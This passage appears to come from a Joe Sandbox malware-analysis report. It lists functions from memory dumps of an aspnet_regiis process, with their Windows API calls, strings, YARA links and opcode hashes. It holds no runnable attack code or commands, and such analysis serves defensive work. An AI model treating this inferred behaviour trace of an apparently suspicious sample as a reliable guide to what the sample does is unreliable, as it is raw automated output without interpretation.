                                                                                                                                                                    • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                                    • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                                    • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                                                                    Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                                    • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                                                                    • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                                    • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                                                                    Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1699248803-0
                                                                                                                                                                    • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                                    • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                                    • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                                                                    Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                                    • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                                                                    • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                                    • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                                                                    Function 0041C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                    • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                                    • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                                                                    Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                    • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                    • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                                                                    • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                    • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 6C7A6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C7A6CCC
                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C7A6D11
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6C7A6D26
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C7A6D35
                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C7A6D53
                                                                                                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C7A6D73
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A6D80
                                                                                                                                                                    • CertGetNameStringW.CRYPT32 ref: 6C7A6DC0
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C7A6DDC
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C7A6DEB
                                                                                                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C7A6DFF
                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C7A6E10
                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6C7A6E27
                                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C7A6E34
                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C7A6EF9
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C7A6F7D
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C7A6F8C
                                                                                                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C7A709D
                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C7A7103
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A7153
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C7A7176
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A7209
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A723A
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A726B
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A729C
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A72DC
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A730D
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C7A73C2
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A73F3
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A73FF
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A7406
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A740D
                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C7A741A
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C7A755A
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7A7568
                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C7A7585
                                                                                                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7A7598
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A75AC
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                    • API String ID: 3256780453-3980470659
                                                                                                                                                                    • Opcode ID: 6a89dff0e1f6f4733007d759e4adb9f1bdd0fee28c8c1d5ad38577399a872d17
                                                                                                                                                                    • Instruction ID: 083584f36766e535edbd20774edfaac258afafcafed6b75fc77ddec9f409dcd8
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a89dff0e1f6f4733007d759e4adb9f1bdd0fee28c8c1d5ad38577399a872d17
                                                                                                                                                                    • Instruction Fuzzy Hash: CA52E7B1A002159FEB21DF64CD89BAA77F8FF55708F1045A9E50897A40DB30AF85CF91
                                                                                                                                                                    Function 6C7DF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7DF09B
                                                                                                                                                                      • Part of subcall function 6C7B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B85
                                                                                                                                                                      • Part of subcall function 6C7B5B50: EnterCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B90
                                                                                                                                                                      • Part of subcall function 6C7B5B50: LeaveCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5BD8
                                                                                                                                                                      • Part of subcall function 6C7B5B50: GetTickCount64.KERNEL32 ref: 6C7B5BE4
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C7DF0AC
                                                                                                                                                                      • Part of subcall function 6C7B5C50: GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                      • Part of subcall function 6C7B5C50: EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C7DF0BE
                                                                                                                                                                      • Part of subcall function 6C7B5C50: __aulldiv.LIBCMT ref: 6C7B5DB4
                                                                                                                                                                      • Part of subcall function 6C7B5C50: LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B5DED
                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7DF155
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF1E0
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF1ED
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF212
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF229
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF231
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF248
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF2AE
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF2BB
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF2F8
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF350
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF35D
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF381
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF398
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF3A0
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF489
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF491
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF3CF
                                                                                                                                                                      • Part of subcall function 6C7DF070: GetCurrentThreadId.KERNEL32 ref: 6C7DF440
                                                                                                                                                                      • Part of subcall function 6C7DF070: AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF44D
                                                                                                                                                                      • Part of subcall function 6C7DF070: ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF472
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF4A8
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF559
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF561
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF577
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF585
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF5A3
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C7DF3A8
                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C7DF239
                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C7DF499
                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C7DF56A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                    • API String ID: 565197838-2840072211
                                                                                                                                                                    • Opcode ID: e591d9c17587e5c34c4ffd28ba98cda258a0236033f0e7b1f91b341596eec98d
                                                                                                                                                                    • Instruction ID: eda8b271d273fbcddc32dbf036038c19441f95371e9a7339167f7c96ea923bdb
                                                                                                                                                                    • Opcode Fuzzy Hash: e591d9c17587e5c34c4ffd28ba98cda258a0236033f0e7b1f91b341596eec98d
                                                                                                                                                                    • Instruction Fuzzy Hash: 68D138717042028FDB209F69D50A7AA77F8EB5636CF15457AE96983F81DB306808C7E2
                                                                                                                                                                    Function 6C7A64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7A64DF
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7A64F2
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C7A6505
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C7A6518
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7A652B
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7A671C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A6724
                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7A672F
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A6759
                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7A6764
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C7A6A80
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C7A6ABE
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A6AD3
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A6AE8
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A6AF7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
